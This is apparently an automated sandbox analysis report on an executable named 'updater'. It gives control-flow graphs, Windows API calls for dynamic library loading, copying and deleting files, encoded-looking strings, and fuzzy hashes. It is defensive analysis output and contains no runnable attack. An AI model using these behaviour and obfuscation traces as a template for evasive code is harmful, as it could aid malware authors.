                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0141E5B3
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 6dff5d6b53566ce8d64383fa53a7f95a8bdd135d4bf79e52ea1aa3123194ae08
                                  • Instruction ID: d4f4a8e2c632237e14f0eae8c1866a65d463d669199a906b202ff49a74696ed0
                                  • Opcode Fuzzy Hash: 6dff5d6b53566ce8d64383fa53a7f95a8bdd135d4bf79e52ea1aa3123194ae08
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • GetSystemTimePreciseAsFileTime, xrefs: 0142FDB7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GetSystemTimePreciseAsFileTime
                                  • API String ID: 0-595813830
                                  • Opcode ID: c26ab8c6b30cf43f0dfe4295e838eeee5ecbd7066cea2b4a72778e8e1ab22d1b
                                  • Instruction ID: 4e97cdf30758beefb134ea827c9d5d5045c65b1c13a1445d2b1b95f5937f6525
                                  • Opcode Fuzzy Hash: c26ab8c6b30cf43f0dfe4295e838eeee5ecbd7066cea2b4a72778e8e1ab22d1b
                                  • Instruction Fuzzy Hash: DAE0C237BC163973D32422D66C05EAA7A16C760AB2F5401ABFF08962309AB1085683D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                  • Instruction ID: c83b1f0514ce511d897b96b13bac6e0b86fc758f4e6297ccc9caa475f8dbe290
                                  • Opcode Fuzzy Hash: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                  • Instruction Fuzzy Hash: 09E04672912228EBCB14DB8DD90498AFBBCEB89A00B55019AFA01D3220C6B0DE40C7D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3752 13d2c33-13d2c52 call 1440cfc 3755 13d2c58-13d2cba call 13c347a call 13de5d4 call 13ddd77 SetCurrentDirectoryA 3752->3755 3756 13d2f67-13d2f82 call 13ddf41 3752->3756 3765 13d2cbc-13d2cce call 141db91 3755->3765 3766 13d2cf6-13d2cfd 3755->3766 3765->3766 3773 13d2cd0-13d2cf5 call 141dfe8 call 141db47 3765->3773 3768 13d2cff 3766->3768 3769 13d2d0e-13d2d23 call 13de8c7 3766->3769 3771 13d2d01-13d2d0c 3768->3771 3776 13d2d25 3769->3776 3777 13d2d27-13d2d42 LoadLibraryA call 13ddf41 3769->3777 3771->3769 3771->3771 3773->3766 3776->3777 3782 13d2f3d-13d2f5b SetCurrentDirectoryA call 13ddf41 3777->3782 3783 13d2d48-13d2d65 3777->3783 3789 13d2f60-13d2f65 3782->3789 3785 13d2d67-13d2d79 call 141db91 3783->3785 3786 13d2da0-13d2da7 3783->3786 3785->3786 3797 13d2d7b-13d2d9f call 141dfe8 call 141db47 3785->3797 3790 13d2da9 3786->3790 3791 13d2db8-13d2df4 GetProcAddress 3786->3791 3789->3756 3795 13d2dab-13d2db6 3790->3795 3792 13d2e2f-13d2e36 3791->3792 3793 13d2df6-13d2e08 call 141db91 3791->3793 3798 13d2e38 3792->3798 3799 13d2e47-13d2e75 GetProcAddress 3792->3799 3793->3792 3805 13d2e0a-13d2e2e call 13dd16e call 141dfe8 call 141db47 3793->3805 3795->3791 3795->3795 3797->3786 3802 13d2e3a-13d2e45 3798->3802 3803 13d2e77-13d2e89 call 141db91 3799->3803 3804 13d2eb0-13d2eb7 3799->3804 3802->3799 3802->3802 3803->3804 3815 13d2e8b-13d2eaf call 13dd67d call 141dfe8 call 141db47 3803->3815 3807 13d2eb9-13d2ec4 3804->3807 3808 13d2ec6-13d2eee GetProcAddress 3804->3808 3805->3792 3807->3807 3807->3808 3813 13d2f25-13d2f38 call 13dd30d GetProcAddress 3808->3813 3814 13d2ef0-13d2f03 call 141db91 3808->3814 3813->3782 3814->3813 3826 13d2f05-13d2f24 call 13dd327 call 141dfe8 call 141db47 3814->3826 3815->3804 3826->3813
                                  APIs
                                    • Part of subcall function 013C347A: ___std_fs_get_current_path@8.LIBCPMT ref: 013C34C9
                                    • Part of subcall function 013DDD77: _Deallocate.LIBCONCRT ref: 013DDD8C
                                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 013D2C8E
                                  • LoadLibraryA.KERNEL32(00000000), ref: 013D2D28
                                  • GetProcAddress.KERNEL32(01465BB8), ref: 013D2DC9
                                  • GetProcAddress.KERNEL32(014654AC), ref: 013D2ED1
                                  • GetProcAddress.KERNEL32(01464FE8), ref: 013D2E52
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • GetProcAddress.KERNEL32(00000000), ref: 013D2F36
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 013D2F56
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressCriticalProcSection$CurrentDirectoryEnterLeave$ConditionDeallocateLibraryLoadVariableWake___std_fs_get_current_path@8
                                  • String ID: BAZ.$K.$`}}q$eKW}
                                  • API String ID: 618739938-911188691
                                  • Opcode ID: 018ecbef486ef0105f6722b0107ef7f8b5c1a849e409dc8e6e53300d07d18d1e
                                  • Instruction ID: adf011e65352f9f83c20f09484125543d15ec7f8a8469887fc5be53aea16d03e
                                  • Opcode Fuzzy Hash: 018ecbef486ef0105f6722b0107ef7f8b5c1a849e409dc8e6e53300d07d18d1e
                                  • Instruction Fuzzy Hash: 4B912271A00246DBDF25EFA8E444A9EBBB4BF6431CF24011EE561AB1B5CB706684CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3883 1406531-1406577 call 1405c8d 3886 1406579-1406584 RemoveDirectoryW 3883->3886 3887 14065da-14065f4 call 14064fd 3883->3887 3889 1406594-140659f GetLastError 3886->3889 3890 1406586-140658f 3886->3890 3896 14065f6-140660c call 13c1d6f 3887->3896 3897 140660e-140662c 3887->3897 3893 14065a1-14065ac DeleteFileW 3889->3893 3894 14065b4-14065d5 GetLastError call 13c1d6f 3889->3894 3892 140668a-1406699 3890->3892 3893->3890 3898 14065ae GetLastError 3893->3898 3894->3892 3903 140667b-1406688 call 1405d9c 3896->3903 3907 1406636-1406641 GetLastError 3897->3907 3908 140662e-1406634 3897->3908 3898->3894 3903->3892 3909 1406653-140666e SetFileInformationByHandle 3907->3909 3910 1406643-1406646 3907->3910 3908->3903 3909->3908 3915 1406670-1406673 GetLastError 3909->3915 3910->3909 3911 1406648-140664b 3910->3911 3911->3909 3912 140664d-1406651 3911->3912 3914 1406679 3912->3914 3914->3903 3915->3914
                                  APIs
                                    • Part of subcall function 01405C8D: GetModuleHandleW.KERNEL32(00000000,00000000,?,01406317,01463954,kernel32.dll,GetFileInformationByHandleEx,01405D5A,00000003,?,00000080,0144439A), ref: 01405C9D
                                    • Part of subcall function 01405C8D: GetProcAddress.KERNEL32(00000000,0144439A,?,01406317,01463954,kernel32.dll,GetFileInformationByHandleEx,01405D5A,00000003,?,00000080,0144439A), ref: 01405CAB
                                  • RemoveDirectoryW.KERNEL32(00000000,01463958,kernel32.dll,SetFileInformationByHandle,01405D5A,CE5F1F10,?,?,?,00000000), ref: 0140657C
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 01406594
                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 014065A4
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 014065AE
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 014065B8
                                  • ___std_fs_open_handle@16.LIBCPMT ref: 014065EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$AddressDeleteDirectoryFileHandleModuleProcRemove___std_fs_open_handle@16
                                  • String ID: SetFileInformationByHandle$kernel32.dll
                                  • API String ID: 1377414829-82236170
                                  • Opcode ID: ec96c78ce19e08c38f01bf30b7263a44e3ecb6d23ac594047eba181495e247ee
                                  • Instruction ID: 8f40deaf5bad38c0e507555d8e522b7126cb08929762b80edfe16fb5cf23ec37
                                  • Opcode Fuzzy Hash: ec96c78ce19e08c38f01bf30b7263a44e3ecb6d23ac594047eba181495e247ee
                                  • Instruction Fuzzy Hash: 03415975A04104ABEB22AB7ACC08BAE7FB5AB44755F154137E906F23F4DB7088168B70
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3916 14344f6-1434506 3917 1434520-1434522 3916->3917 3918 1434508-143451b call 1423c91 call 1423ca4 3916->3918 3920 1434887-1434894 call 1423c91 call 1423ca4 3917->3920 3921 1434528-143452e 3917->3921 3935 143489f 3918->3935 3940 143489a call 1423529 3920->3940 3921->3920 3922 1434534-143455a 3921->3922 3922->3920 3925 1434560-1434569 3922->3925 3928 1434583-1434585 3925->3928 3929 143456b-143457e call 1423c91 call 1423ca4 3925->3929 3933 1434883-1434885 3928->3933 3934 143458b-143458e 3928->3934 3929->3940 3937 14348a2-14348a5 3933->3937 3934->3933 3939 1434594-1434598 3934->3939 3935->3937 3939->3929 3943 143459a-14345b1 3939->3943 3940->3935 3945 14345b3-14345b6 3943->3945 3946 1434602-1434608 3943->3946 3949 14345c6-14345cc 3945->3949 3950 14345b8-14345c1 3945->3950 3947 143460a-1434614 3946->3947 3948 14345ce-14345e5 call 1423c91 call 1423ca4 call 1423529 3946->3948 3951 1434616-1434618 3947->3951 3952 143461b-1434639 call 143255c call 1430123 * 2 3947->3952 3980 14347ba 3948->3980 3949->3948 3954 14345ea-14345fd 3949->3954 3953 1434686-1434696 3950->3953 3951->3952 3984 1434656-143467f call 143cafc 3952->3984 3985 143463b-1434651 call 1423ca4 call 1423c91 3952->3985 3957 143475b-1434764 call 143c903 3953->3957 3958 143469c-14346a8 3953->3958 3954->3953 3969 14347d7 3957->3969 3970 1434766-1434778 3957->3970 3958->3957 3962 14346ae-14346b0 3958->3962 3962->3957 3966 14346b6-14346da 3962->3966 3966->3957 3971 14346dc-14346f2 3966->3971 3973 14347db-14347f3 ReadFile 3969->3973 3970->3969 3975 143477a-1434789 GetConsoleMode 3970->3975 3971->3957 3976 14346f4-14346f6 3971->3976 3978 14347f5-14347fb 3973->3978 3979 143484f-143485a GetLastError 3973->3979 3975->3969 3981 143478b-143478f 3975->3981 3976->3957 3982 14346f8-143471e 3976->3982 3978->3979 3988 14347fd 3978->3988 3986 1434873-1434876 3979->3986 3987 143485c-143486e call 1423ca4 call 1423c91 3979->3987 3990 14347bd-14347c7 call 1430123 3980->3990 3981->3973 3989 1434791-14347ab ReadConsoleW 3981->3989 3982->3957 3991 1434720-1434736 3982->3991 3984->3953 3985->3980 3997 14347b3-14347b9 __dosmaperr 3986->3997 3998 143487c-143487e 3986->3998 3987->3980 3995 1434800-1434812 3988->3995 3999 14347ad GetLastError 3989->3999 4000 14347cc-14347d5 3989->4000 3990->3937 3991->3957 3992 1434738-143473a 3991->3992 3992->3957 4002 143473c-1434756 3992->4002 3995->3990 4005 1434814-1434818 3995->4005 3997->3980 3998->3990 3999->3997 4000->3995 4002->3957 4010 1434831-143483c 4005->4010 4011 143481a-143482a call 1434210 4005->4011 4015 1434848-143484d call 143403f 4010->4015 4016 143483e call 1434367 4010->4016 4021 143482d-143482f 4011->4021 4022 1434843-1434846 4015->4022 4016->4022 4021->3990 4022->4021
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 63e6a948fa9b505e8253cb200bdf17975051419d9a9bb6847a10369e115017e1
                                  • Instruction ID: c3f195460ad88ba294e15d0c72527c35ec3dfb9611aabb0fa6d1ccbaf19c27de
                                  • Opcode Fuzzy Hash: 63e6a948fa9b505e8253cb200bdf17975051419d9a9bb6847a10369e115017e1
                                  • Instruction Fuzzy Hash: A7C1D074A002469FDF16DF9AD880BEEBBB0BF9E314F08405AE5159B3A1C7349942CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4023 13cddc0-13cdeb7 call 1440cfc call 13c8f5d * 2 call 13de8c7 call 13dfa3b call 13de917 call 13dfa3b call 13ddf41 * 5 4048 13cdeb9-13cdecb call 141db91 4023->4048 4049 13cdef2-13cdef9 4023->4049 4048->4049 4057 13cdecd-13cdef1 call 141dfe8 call 141db47 4048->4057 4050 13cdf0a-13cdf2d 4049->4050 4051 13cdefb 4049->4051 4055 13cdf2f-13cdf41 call 141db91 4050->4055 4056 13cdf6a-13cdf71 4050->4056 4054 13cdefd-13cdf08 4051->4054 4054->4050 4054->4054 4055->4056 4067 13cdf43-13cdf69 call 141dfe8 call 141db47 4055->4067 4058 13cdf82-13cdfc7 call 13dda74 4056->4058 4059 13cdf73 4056->4059 4057->4049 4069 13cdffe-13ce005 4058->4069 4070 13cdfc9-13cdfdc call 141db91 4058->4070 4062 13cdf75-13cdf80 4059->4062 4062->4058 4062->4062 4067->4056 4072 13ce016-13ce09e call 13dda74 call 13dbb72 call 13de917 call 13ddf41 call 13dfec9 call 13c3174 call 13ddd77 4069->4072 4073 13ce007 4069->4073 4070->4069 4083 13cdfde-13cdffd call 13dd272 call 141dfe8 call 141db47 4070->4083 4102 13ce1c9-13ce23d call 13dfec9 call 13c3225 call 13ddd77 call 13ddf41 * 2 4072->4102 4103 13ce0a4-13ce0fe call 13dfec9 call 13c3225 call 13ddd77 CopyFileA 4072->4103 4078 13ce009-13ce014 4073->4078 4078->4072 4078->4078 4083->4069 4103->4102 4116 13ce104-13ce144 4103->4116 4118 13ce17b-13ce182 4116->4118 4119 13ce146-13ce159 call 141db91 4116->4119 4121 13ce184 4118->4121 4122 13ce193-13ce1bf call 13c83df 4118->4122 4119->4118 4130 13ce15b-13ce17a call 13dd1e6 call 141dfe8 call 141db47 4119->4130 4125 13ce186-13ce191 4121->4125 4122->4102 4125->4122 4125->4125 4130->4118
                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CE0F6
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$.$.$A\Kr$JOZ.$KZ$OZ$YOBB$rYOBBKZJOZ.
                                  • API String ID: 265086031-884814007
                                  • Opcode ID: 7982da8f42d177e47ee405d903a0ccb8f51063835126966903f7166038c38a92
                                  • Instruction ID: f2e25a0c1e166b44c370d27c9aa0ef453468213c86ef4c4cf5ea958ca061f969
                                  • Opcode Fuzzy Hash: 7982da8f42d177e47ee405d903a0ccb8f51063835126966903f7166038c38a92
                                  • Instruction Fuzzy Hash: A4C1F331D04289DFDF25EBE8D844BDDBBB0BF21718F24409DE0456B2A5DB701A89CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4137 143c47c-143c4ac call 143c1ca 4140 143c4c7-143c4d3 call 143900e 4137->4140 4141 143c4ae-143c4b9 call 1423c91 4137->4141 4146 143c4d5-143c4ea call 1423c91 call 1423ca4 4140->4146 4147 143c4ec-143c535 call 143c135 4140->4147 4148 143c4bb-143c4c2 call 1423ca4 4141->4148 4146->4148 4156 143c5a2-143c5ab GetFileType 4147->4156 4157 143c537-143c540 4147->4157 4158 143c7a1-143c7a5 4148->4158 4162 143c5f4-143c5f7 4156->4162 4163 143c5ad-143c5de GetLastError __dosmaperr CloseHandle 4156->4163 4160 143c542-143c546 4157->4160 4161 143c577-143c59d GetLastError __dosmaperr 4157->4161 4160->4161 4167 143c548-143c575 call 143c135 4160->4167 4161->4148 4165 143c600-143c606 4162->4165 4166 143c5f9-143c5fe 4162->4166 4163->4148 4164 143c5e4-143c5ef call 1423ca4 4163->4164 4164->4148 4169 143c60a-143c658 call 1438f59 4165->4169 4170 143c608 4165->4170 4166->4169 4167->4156 4167->4161 4176 143c677-143c69f call 143bee2 4169->4176 4177 143c65a-143c666 call 143c344 4169->4177 4170->4169 4182 143c6a1-143c6a2 4176->4182 4183 143c6a4-143c6e5 4176->4183 4177->4176 4184 143c668 4177->4184 4185 143c66a-143c672 call 14310e3 4182->4185 4186 143c6e7-143c6eb 4183->4186 4187 143c706-143c714 4183->4187 4184->4185 4185->4158 4186->4187 4188 143c6ed-143c701 4186->4188 4189 143c71a-143c71e 4187->4189 4190 143c79f 4187->4190 4188->4187 4189->4190 4193 143c720-143c753 CloseHandle call 143c135 4189->4193 4190->4158 4196 143c787-143c79b 4193->4196 4197 143c755-143c781 GetLastError __dosmaperr call 1439121 4193->4197 4196->4190 4197->4196
                                  APIs
                                    • Part of subcall function 0143C135: CreateFileW.KERNEL32(00000000,00000000,?,0143C525,?,?,00000000), ref: 0143C152
                                  • GetLastError.KERNEL32 ref: 0143C590
                                  • __dosmaperr.LIBCMT ref: 0143C597
                                  • GetFileType.KERNEL32 ref: 0143C5A3
                                  • GetLastError.KERNEL32 ref: 0143C5AD
                                  • __dosmaperr.LIBCMT ref: 0143C5B6
                                  • CloseHandle.KERNEL32(00000000), ref: 0143C5D6
                                  • CloseHandle.KERNEL32(01430CCF), ref: 0143C723
                                  • GetLastError.KERNEL32 ref: 0143C755
                                  • __dosmaperr.LIBCMT ref: 0143C75C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 87439af1f5137e60685ebce70b2f1b1afd9b5593f4f2e219e55686311b3f1c9b
                                  • Instruction ID: 8a1e0bbee969944495672b0b4e35a1886331cc4a5cb93863010bbde608c22e9a
                                  • Opcode Fuzzy Hash: 87439af1f5137e60685ebce70b2f1b1afd9b5593f4f2e219e55686311b3f1c9b
                                  • Instruction Fuzzy Hash: 6AA12632A041558FCF1ADF78DC917AE3BB1AB9A324F18015FE801AB3B1CB359812CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4200 13cf68f-13cf786 call 1440cfc call 13c8f5d * 2 call 13de8c7 call 13dfa3b call 13de917 call 13dfa3b call 13ddf41 * 5 4225 13cf788-13cf79a call 141db91 4200->4225 4226 13cf7c1-13cf7c8 4200->4226 4225->4226 4237 13cf79c-13cf7c0 call 141dfe8 call 141db47 4225->4237 4227 13cf7d9-13cf7fc 4226->4227 4228 13cf7ca 4226->4228 4231 13cf7fe-13cf810 call 141db91 4227->4231 4232 13cf839-13cf840 4227->4232 4230 13cf7cc-13cf7d7 4228->4230 4230->4227 4230->4230 4231->4232 4244 13cf812-13cf838 call 141dfe8 call 141db47 4231->4244 4234 13cf851-13cf89c call 13dda74 4232->4234 4235 13cf842 4232->4235 4246 13cf89e-13cf8b1 call 141db91 4234->4246 4247 13cf8d3-13cf8da 4234->4247 4239 13cf844-13cf84f 4235->4239 4237->4226 4239->4234 4239->4239 4244->4232 4246->4247 4259 13cf8b3-13cf8d2 call 13dd1e6 call 141dfe8 call 141db47 4246->4259 4249 13cf8dc 4247->4249 4250 13cf8eb-13cf973 call 13dda74 call 13dbb72 call 13de917 call 13ddf41 call 13dfec9 call 13c3174 call 13ddd77 4247->4250 4254 13cf8de-13cf8e9 4249->4254 4279 13cf979-13cf9d3 call 13dfec9 call 13c3225 call 13ddd77 CopyFileA 4250->4279 4280 13cfa94-13cfb08 call 13dfec9 call 13c3225 call 13ddd77 call 13ddf41 * 2 4250->4280 4254->4250 4254->4254 4259->4247 4279->4280 4294 13cf9d9-13cfa0f 4279->4294 4296 13cfa46-13cfa4d 4294->4296 4297 13cfa11-13cfa24 call 141db91 4294->4297 4299 13cfa5e-13cfa8a call 13c83df 4296->4299 4300 13cfa4f 4296->4300 4297->4296 4307 13cfa26-13cfa45 call 13dd5ef call 141dfe8 call 141db47 4297->4307 4299->4280 4303 13cfa51-13cfa5c 4300->4303 4303->4299 4303->4303 4307->4296
                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CF9CB
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$.$BKZ$G\$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                  • API String ID: 265086031-3695542673
                                  • Opcode ID: fd25e40bc74428bc829f0d61c8eb7c706ef96a4de5df28f4e052ae2ba4bc3721
                                  • Instruction ID: d7ca4d761c36282f348f0eb4dd81d41d18d5a4097e7d078a3d6af80d60fca769
                                  • Opcode Fuzzy Hash: fd25e40bc74428bc829f0d61c8eb7c706ef96a4de5df28f4e052ae2ba4bc3721
                                  • Instruction Fuzzy Hash: DEC1F231D0028ADEDF15EBE8D884BDDBBB5BF21708F24409ED5457B2A5DB701A49CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
